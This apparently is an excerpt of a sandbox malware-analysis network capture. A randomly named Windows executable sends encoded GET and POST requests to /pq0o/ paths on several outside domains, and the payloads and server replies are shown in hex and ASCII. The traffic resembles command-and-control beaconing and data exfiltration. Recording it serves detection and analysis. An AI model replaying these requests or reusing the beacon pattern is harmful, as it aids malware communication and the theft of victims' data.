F1RvI6AiT0c2+gNaa32bWS0J8Gb3ECd+18m60IQTy/JCTmAwXy6Zw217ErXdRRecl7Kcwvssp3qrh+MyCrWW3/dMIG5N/lpBBWMM/w1ttMnxPtS9XS75buWG7UN0usRpwmtpT/oKPk7itSGxc8CqH3C2WuAhHY5edy8ZSxmXML7U1yxtXSfD0T82SZXRfNG0cpV+MFHmB+uScpHrfzFZ/F4EsGEuimy8o2e3YIjFzwuyol0Y5f55cH+jjuJfkrrx2cTcoUEKPzXc/vXeaZJom2u77hwp0Yn9fx3lN8GilcRYkBa+cKwDW9W0iMd+stMngIwffgvWonap522wcE5VzgsCeyNV1XSwrKzWAeUFMnhDPzDhxjy8udr56/IBVSXhSWJF7yFrpWuz69iWQhMg4OiJ3IZkSTQL6yPu7eua/AdkZhDf4JIZlaOFdwO55/DNyUjg1Z2hXPxcaCb6T7H4wpcCOXZkTbmF6P9gdYSPLwcO9JFbSaElYNjS6nVmCv1LaNqR+vZ9bPJBHZVjgXtVYToUopTfvwSibfwt+ZTRvl+Dm1TeBRobKpye9CHifKjkyhFrq415lnnlDDX6SLCRr9q4QxdMw0n6vxm22R9eRl6zMiaOlelGMEahVvva0FqeIuW79yf7VepU0RG5Rxe4EIeHLavAkVeLMZ5LwNpbxqrlPL8TEsEXJCu4N+3cD+Ty7RSlejgWHIcwK0y5qHwXTpD0R+G7y7f0W/S66fns1IPLYBbXEhL+Yrvrqpk
Apr 24, 2024 09:23:15.062172890 CEST	711	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.1 Date: Wed, 24 Apr 2024 07:23:14 GMT Content-Type: text/html Content-Length: 559 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49775	213.171.195.105	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:17.591944933 CEST	359	OUT	GET /pq0o/?F49hs=MObKLoLcQ3KtCADN97wn86+o0wPQork8bFr1s6JTaoDyqc40RECNe9PhrOxqi3MgZSZhgejHn8Ef7GGARJGddcFpBOofhs/CBnQlSCAqoezIccakXprB4JQ=&9ZZXx=T6kxVZuXAVuH9J HTTP/1.1 Host: www.holein1sa.com Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 24, 2024 09:23:17.886183977 CEST	234	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 24 Apr 2024 07:23:17 GMT Content-Type: text/html Content-Length: 2873 Last-Modified: Mon, 31 Jul 2023 14:17:53 GMT Connection: close ETag: "64c7c291-b39" Accept-Ranges: bytes
Apr 24, 2024 09:23:17.886213064 CEST	1289	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title> <link rel=
Apr 24, 2024 09:23:17.886240959 CEST	1289	IN	Data Raw: 20 61 20 73 69 6d 69 6c 61 72 20 64 6f 6d 61 69 6e 20 74 6f 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 74 72 6f 6e 67 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 56 61 72 22 3e 3c 2f 73 70 61 6e 3e 3f 3c 2f 73 74 Data Ascii: a similar domain to <br> <strong><span class="domainVar"></span>?</strong> </h3> <a class="cta cta--primary" rel="nofollow" id="domainSearchCta">Start search</a> </div> <div class="card card--i
Apr 24, 2024 09:23:17.886276960 CEST	295	IN	Data Raw: 22 29 2e 66 6f 72 45 61 63 68 28 70 6c 61 63 65 68 6f 6c 64 65 72 20 3d 3e 20 70 6c 61 63 65 68 6f 6c 64 65 72 2e 69 6e 6e 65 72 54 65 78 74 20 3d 20 63 6c 65 61 6e 48 6f 73 74 6e 61 6d 65 29 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 Data Ascii: ").forEach(placeholder => placeholder.innerText = cleanHostname) document.getElementById("domainSearchCta").href = `https://www.fasthosts.co.uk/domain-names/search/?domain=${cleanHostname}&utm_source=domainparking&utm_medium=referral&utm_c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49776	162.43.104.164	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:23.576973915 CEST	629	OUT	POST /pq0o/ HTTP/1.1 Host: www.shun-yamagata.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.shun-yamagata.com Content-Length: 202 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.shun-yamagata.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 57 30 43 6c 6c 68 35 5a 53 47 38 6d 38 39 47 5a 62 68 31 66 32 34 47 6a 43 57 4d 66 53 57 39 2b 77 50 45 73 42 36 2f 46 64 79 6a 59 67 53 44 79 6b 73 6b 50 39 4a 69 45 39 65 6a 43 2b 30 64 78 6e 32 6a 67 39 75 43 72 46 57 46 39 32 77 79 56 52 43 47 76 4e 31 4a 49 67 75 6e 58 47 35 30 79 71 41 79 59 4c 64 35 53 74 4a 4a 41 7a 63 4e 70 79 31 53 74 69 61 51 74 4b 6a 61 46 75 53 38 73 6d 5a 64 55 6d 34 62 52 34 47 46 36 57 77 49 4b 46 33 69 77 50 46 62 7a 4e 62 65 33 46 52 59 36 4c 6c 79 61 76 2b 71 58 36 36 74 68 69 4d 59 65 4e 32 4c 75 68 69 44 7a 4e 59 5a 44 53 6d 71 65 4c 77 3d 3d Data Ascii: F49hs=W0Cllh5ZSG8m89GZbh1f24GjCWMfSW9+wPEsB6/FdyjYgSDykskP9JiE9ejC+0dxn2jg9uCrFWF92wyVRCGvN1JIgunXG50yqAyYLd5StJJAzcNpy1StiaQtKjaFuS8smZdUm4bR4GF6WwIKF3iwPFbzNbe3FRY6Llyav+qX66thiMYeN2LuhiDzNYZDSmqeLw==
Apr 24, 2024 09:23:23.848611116 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 24 Apr 2024 07:23:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT ETag: W/"afe-6014d9a904f4f" Content-Encoding: gzip Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b 2c cf 6a Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D\|v$g\|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HEske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>\|Y\|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D\|Wz7t!9),KQ8xa%9s{Qo/\|mu1.C-r[,j
Apr 24, 2024 09:23:23.848648071 CEST	300	IN	Data Raw: b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64 ea c5 69 Data Ascii: -%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49777	162.43.104.164	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:26.383948088 CEST	649	OUT	POST /pq0o/ HTTP/1.1 Host: www.shun-yamagata.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.shun-yamagata.com Content-Length: 222 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.shun-yamagata.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 57 30 43 6c 6c 68 35 5a 53 47 38 6d 75 4e 32 5a 58 69 74 66 36 49 48 52 62 57 4d 66 59 32 39 36 77 50 41 73 42 37 72 56 64 41 33 59 67 33 2f 79 31 65 63 50 75 35 69 45 6c 4f 6a 48 6a 6b 64 76 6e 32 2b 44 39 71 43 72 46 57 68 39 32 78 43 56 52 31 79 6f 43 46 4a 4b 6f 4f 6e 56 49 5a 30 79 71 41 79 59 4c 64 74 38 74 49 68 41 7a 73 64 70 7a 55 53 75 73 36 51 69 63 7a 61 46 2f 69 38 6f 6d 5a 64 6d 6d 39 2f 33 34 45 4e 36 57 31 30 4b 47 69 43 33 45 46 62 71 43 37 65 6f 4d 68 6c 70 42 58 32 53 77 65 75 32 39 72 64 65 75 71 4a 45 63 48 71 35 7a 69 6e 41 51 66 51 33 66 6c 58 58 51 78 6e 6d 77 30 50 74 44 6a 4d 32 36 6d 61 75 74 41 65 32 34 2f 30 3d Data Ascii: F49hs=W0Cllh5ZSG8muN2ZXitf6IHRbWMfY296wPAsB7rVdA3Yg3/y1ecPu5iElOjHjkdvn2+D9qCrFWh92xCVR1yoCFJKoOnVIZ0yqAyYLdt8tIhAzsdpzUSus6QiczaF/i8omZdmm9/34EN6W10KGiC3EFbqC7eoMhlpBX2Sweu29rdeuqJEcHq5zinAQfQ3flXXQxnmw0PtDjM26mautAe24/0=
Apr 24, 2024 09:23:26.654306889 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 24 Apr 2024 07:23:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT ETag: W/"afe-6014d9a904f4f" Content-Encoding: gzip Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b 2c cf 6a Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D\|v$g\|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HEske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>\|Y\|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D\|Wz7t!9),KQ8xa%9s{Qo/\|mu1.C-r[,j
Apr 24, 2024 09:23:26.654349089 CEST	300	IN	Data Raw: b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64 ea c5 69 Data Ascii: -%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49778	162.43.104.164	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:23:29.176471949 CEST	10731	OUT	POST /pq0o/ HTTP/1.1 Host: www.shun-yamagata.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.shun-yamagata.com Content-Length: 10302 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.shun-yamagata.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 57 30 43 6c 6c 68 35 5a 53 47 38 6d 75 4e 32 5a 58 69 74 66 36 49 48 52 62 57 4d 66 59 32 39 36 77 50 41 73 42 37 72 56 64 41 50 59 6a 43 7a 79 6b 4a 49 50 2f 4a 69 45 37 65 6a 47 6a 6b 63 71 6e 32 6d 66 39 71 50 57 46 55 70 39 33 54 6d 56 54 48 61 6f 5a 31 4a 4b 6b 75 6e 59 47 35 31 6f 71 41 6a 54 4c 64 39 38 74 49 68 41 7a 76 31 70 7a 46 53 75 38 4b 51 74 4b 6a 61 5a 75 53 38 51 6d 59 30 52 6d 38 2f 42 34 56 74 36 58 56 45 4b 44 52 71 33 59 56 62 2f 44 37 66 39 4d 68 6f 78 42 58 72 70 77 64 79 51 39 72 70 65 2f 2f 38 43 4c 46 2b 77 6f 51 54 59 42 75 46 52 66 46 33 35 52 6a 76 48 30 33 47 78 62 7a 51 36 38 47 2f 62 78 77 47 4c 73 5a 30 39 59 74 58 71 46 67 56 54 45 43 4c 79 6c 59 41 38 4c 49 4f 4a 78 63 39 68 31 73 2f 2f 6a 62 6d 33 6a 49 66 48 44 48 67 47 39 43 55 76 5a 38 58 43 32 65 72 66 68 4f 31 61 70 79 72 41 72 4e 38 67 70 65 6d 48 50 73 68 6b 4f 61 70 73 5a 73 67 46 35 32 58 4d 77 31 6e 73 2b 71 39 49 56 49 32 65 6c 4c 75 41 71 53 77 33 73 54 59 41 48 75 4e 59 48 49 4e 2b 2b 32 37 37 33 4d 57 74 64 53 2b 76 32 61 62 6d 52 47 32 4d 35 50 62 78 7a 45 59 34 56 65 65 39 71 74 4b 6b 49 59 33 76 46 32 59 6b 65 56 5a 37 74 72 34 33 74 65 54 61 38 30 73 48 78 43 71 34 56 62 6c 65 62 79 49 66 76 68 55 41 69 77 49 77 52 67 6b 30 64 4b 37 41 34 44 74 69 70 70 34 68 47 67 70 66 6f 58 7a 6c 72 52 74 47 32 6e 56 4b 73 69 46 6b 67 41 32 56 42 5a 4d 58 44 4c 32 64 38 4f 59 42 4c 4f 76 4e 6d 64 6a 4c 33 42 4d 4f 33 64 68 37 79 4d 7a 6a 6a 2f 45 76 67 54 68 45 68 55 4b 6c 4b 74 5a 76 38 74 46 70 45 41 36 31 6f 4f 32 4e 32 51 38 34 4b 6d 49 70 51 54 36 39 6f 4b 4d 6e 64 66 52 54 46 6f 54 66 41 44 77 73 38 65 73 31 54 6f 2f 73 48 4b 74 4e 2f 35 75 34 34 36 50 43 64 46 30 36 79 73 69 35 33 63 58 45 79 34 6d 41 61 46 71 41 75 77 50 39 76 38 4a 7a 57 61 2f 44 75 71 42 63 4a 75 4c 72 46 6b 4a 6c 31 71 64 32 71 52 37 42 69 78 6f 6d 58 4d 39 68 34 4a 2b 53 76 6a 36 74 33 6d 37 58 36 65 31 2b 47 77 57 61 57 59 39 44 6a 4a 68 66 73 61 2f 4c 2f 59 4c 6f 45 62 61 73 77 4a 63 6e 7a 45 68 43 49 61 44 7a 4d 56 70 48 7a 55 63 37 73 59 4f 73 78 